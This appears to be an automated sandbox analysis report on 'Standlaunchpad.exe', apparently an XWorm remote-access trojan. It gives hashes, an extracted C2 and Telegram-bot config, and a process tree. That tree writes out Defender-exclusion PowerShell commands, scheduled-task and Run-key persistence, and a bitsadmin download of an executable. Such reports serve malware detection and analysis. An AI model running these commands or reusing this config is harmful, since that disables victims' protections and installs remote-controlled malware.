Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15/04/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
Standlaunchpad.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Standlaunchpad.exe
Resource
win10v2004-20240412-en
General
-
Target
Standlaunchpad.exe
-
Size
132KB
-
MD5
716265d64dd58c6f312693e6c69844e1
-
SHA1
6db8ea7cdc175319aef202c1c61b228bdce2ae9b
-
SHA256
e819962c084d4fad69a9f30b7a4e5d2cbb3d7e9af3f4a19b7a285ad3630d1da8
-
SHA512
a9dc84f961f3c363cfe129f5e9f5e3311a95d9defb84b59e99d428b4e1a432e23f3016dae993e12744335c915b0902e17c74c0c37b5c330b92357254250ba801
-
SSDEEP
1536:buFEExqQ91YIprw6LUWIzQ2rk/xww6Ubv3bVuxPuz/5jcRU9DUq7HlxJxZr:b7Q9yIp9IhT8H6Ubv3pWu9z9DUqxx5r
Malware Config
Extracted
xworm
127.0.0.1:18082
147.185.221.18:18082
8.tcp.us-cal-1.ngrok.io:18082
-
Install_directory
%Temp%
-
install_file
Stand.exe
-
telegram
https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2968-89-0x0000000002260000-0x000000000226E000-memory.dmp disable_win_def -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000b000000012250-5.dat family_xworm behavioral1/memory/2968-9-0x00000000003A0000-0x00000000003BE000-memory.dmp family_xworm behavioral1/memory/2564-93-0x0000000000EA0000-0x0000000000EBE000-memory.dmp family_xworm -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Standlaunchpad.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Standlaunchpad.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stand.lnk Stand.exe -
Executes dropped EXE 3 IoCs
pid Process 2968 Standlaunchpad.exe 2564 Stand.exe 1572 Stand.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" Standlaunchpad.exe Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Stand = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Stand.exe" Stand.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 12 8.tcp.us-cal-1.ngrok.io -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 16 ip-api.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2756 schtasks.exe 2084 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2472 bitsadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 2968 Standlaunchpad.exe 2216 vlc.exe 1572 Stand.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 2664 powershell.exe 1748 powershell.exe 1324 powershell.exe 1688 powershell.exe 2968 Standlaunchpad.exe 2968 Standlaunchpad.exe 2968 Standlaunchpad.exe 2968 Standlaunchpad.exe 2968 Standlaunchpad.exe 2968 Standlaunchpad.exe 1204 powershell.exe 560 powershell.exe 2288 powershell.exe 1664 powershell.exe 1572 Stand.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2216 vlc.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2968 Standlaunchpad.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeDebugPrivilege 2968 Standlaunchpad.exe Token: SeDebugPrivilege 2564 Stand.exe Token: SeDebugPrivilege 1572 Stand.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 1572 Stand.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe 2216 vlc.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2968 Standlaunchpad.exe 2216 vlc.exe 1572 Stand.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2968 2436 Standlaunchpad.exe 28 PID 2436 wrote to memory of 2968 2436 Standlaunchpad.exe 28 PID 2436 wrote to memory of 2968 2436 Standlaunchpad.exe 28 PID 2436 wrote to memory of 2508 2436 Standlaunchpad.exe 29 PID 2436 wrote to memory of 2508 2436 Standlaunchpad.exe 29 PID 2436 wrote to memory of 2508 2436 Standlaunchpad.exe 29 PID 2436 wrote to memory of 2508 2436 Standlaunchpad.exe 29 PID 2508 wrote to memory of 2472 2508 mshta.exe 30 PID 2508 wrote to memory of 2472 2508 mshta.exe 30 PID 2508 wrote to memory of 2472 2508 mshta.exe 30 PID 2508 wrote to memory of 2472 2508 mshta.exe 30 PID 2968 wrote to memory of 2664 2968 Standlaunchpad.exe 33 PID 2968 wrote to memory of 2664 2968 Standlaunchpad.exe 33 PID 2968 wrote to memory of 2664 2968 Standlaunchpad.exe 33 PID 2968 wrote to memory of 1748 2968 Standlaunchpad.exe 35 PID 2968 wrote to memory of 1748 2968 Standlaunchpad.exe 35 PID 2968 wrote to memory of 1748 2968 Standlaunchpad.exe 35 PID 2968 wrote to memory of 1324 2968 Standlaunchpad.exe 37 PID 2968 wrote to memory of 1324 2968 Standlaunchpad.exe 37 PID 2968 wrote to memory of 1324 2968 Standlaunchpad.exe 37 PID 2968 wrote to memory of 1688 2968 Standlaunchpad.exe 39 PID 2968 wrote to memory of 1688 2968 Standlaunchpad.exe 39 PID 2968 wrote to memory of 1688 2968 Standlaunchpad.exe 39 PID 2968 wrote to memory of 2756 2968 Standlaunchpad.exe 41 PID 2968 wrote to memory of 2756 2968 Standlaunchpad.exe 41 PID 2968 wrote to memory of 2756 2968 Standlaunchpad.exe 41 PID 2348 wrote to memory of 2564 2348 taskeng.exe 47 PID 2348 wrote to memory of 2564 2348 taskeng.exe 47 PID 2348 wrote to memory of 2564 2348 taskeng.exe 47 PID 2968 wrote to memory of 1016 2968 Standlaunchpad.exe 48 PID 2968 wrote to memory of 1016 2968 Standlaunchpad.exe 48 PID 2968 wrote to memory of 1016 2968 Standlaunchpad.exe 48 PID 2968 wrote to memory of 1016 2968 Standlaunchpad.exe 48 PID 2348 wrote to memory of 1572 2348 taskeng.exe 49 PID 2348 wrote to memory of 1572 2348 taskeng.exe 49 PID 2348 wrote to memory of 1572 2348 taskeng.exe 49 PID 1572 wrote to memory of 1204 1572 Stand.exe 50 PID 1572 wrote to memory of 1204 1572 Stand.exe 50 PID 1572 wrote to memory of 1204 1572 Stand.exe 50 PID 1572 wrote to memory of 560 1572 Stand.exe 52 PID 1572 wrote to memory of 560 1572 Stand.exe 52 PID 1572 wrote to memory of 560 1572 Stand.exe 52 PID 1572 wrote to memory of 2288 1572 Stand.exe 54 PID 1572 wrote to memory of 2288 1572 Stand.exe 54 PID 1572 wrote to memory of 2288 1572 Stand.exe 54 PID 1572 wrote to memory of 1664 1572 Stand.exe 56 PID 1572 wrote to memory of 1664 1572 Stand.exe 56 PID 1572 wrote to memory of 1664 1572 Stand.exe 56 PID 1572 wrote to memory of 2084 1572 Stand.exe 58 PID 1572 wrote to memory of 2084 1572 Stand.exe 58 PID 1572 wrote to memory of 2084 1572 Stand.exe 58 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe"C:\Users\Admin\AppData\Local\Temp\Standlaunchpad.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe"C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Standlaunchpad.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Standlaunchpad.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Creates scheduled task(s)
PID:2756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 52.9.153.64 18082 <123456789> 295C560058E07047CC6F3⤵PID:1016
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe3⤵
- Download via BitsAdmin
PID:2472
-
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PublishApprove.rmi"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2216
-
C:\Windows\system32\taskeng.exetaskeng.exe {2706E96B-FAB9-4669-AA97-C426BEE04118} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\Stand.exeC:\Users\Admin\AppData\Local\Temp\Stand.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"3⤵
- Creates scheduled task(s)
PID:2084
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
895B
MD5053491717083a49c85cad7584f55ba79
SHA1a7645a49952788db42bf667afa10e37123bd1317
SHA2563902c3a03d0e50e5100d5e2b81d3775e2e43433293ba174cca523f6009e35b79
SHA512936f02b49df1caf11ad7ebe26f28701b45cbcbd6de7d0a151ef65d090295cdc91270845220582dcae089ca26fdc1e5dfe4f90f626dc36643d7f2bc556ca8cb89
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dd9902b449329be1401168f5e5e8f33c
SHA1f44bc109cf6ac885a712213d74736f9422dbf013
SHA256d830968b0b1899671c9a984e43e2b082148c3d16495a8fa2f39871af5a08227a
SHA512c31c9fb04f0531a83ffe91bb8c854cf513a0b2fff379a0227f3d28ad3bf02eff2cfff7cc8ae25ede7f143a5a58f0cc5506a4eb4e972fa5de94055c5ce85e1cef
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXE3JZDF997RJEYCLOSZ.temp
Filesize7KB
MD5cc28717a1794355ea99c04c34220f80f
SHA1564bcde434942c14ce396aaf99fc819920de464d
SHA256dfea251434309012bf71a26e8edfd92c9ec40aa647b0e40af332ea4186701627
SHA51292375c29597721601a475913e0106a233af959bb396ce6b03b689d279bf34a0eb2789313103f7873473c88942927d149535ef29060b4a6cf4f2ab69e3fac81d1
-
Filesize
936B
MD5ae64d0fb4286163403d5c9e92fe07471
SHA12f5b48550a872917a3f4cc83152855b94e59d673
SHA2566e8acc6a96a56ad9d67b936f9cfffff07fef290aabc66f061c5f8cf25ddb03d9
SHA512ca9258b39ad984bbef6a6adbac3d866c156ca35bfb8a78c45f2bd62b72723c1a0d19fa35f8ca17c27d27625b938d1c6cdbac8b3a031e776abc75a7dcc6a6956a
-
Filesize
96KB
MD5bf7ee4fc77d1bd202db4d8f3012b1b25
SHA12e82842aaec5d9e6e93ce335260ab5bba65be5be
SHA2561881352351ae38d8f746418425758711c3204b182cc53634d5e55de6a05bfa0d
SHA5127265349a5363b1c38d919195c13320d4e68b687189223b7e705e7d32630959b22834f8462dd586aef9536f84a8d2a4b6a46d8a43bc0a59688615b06387902eb8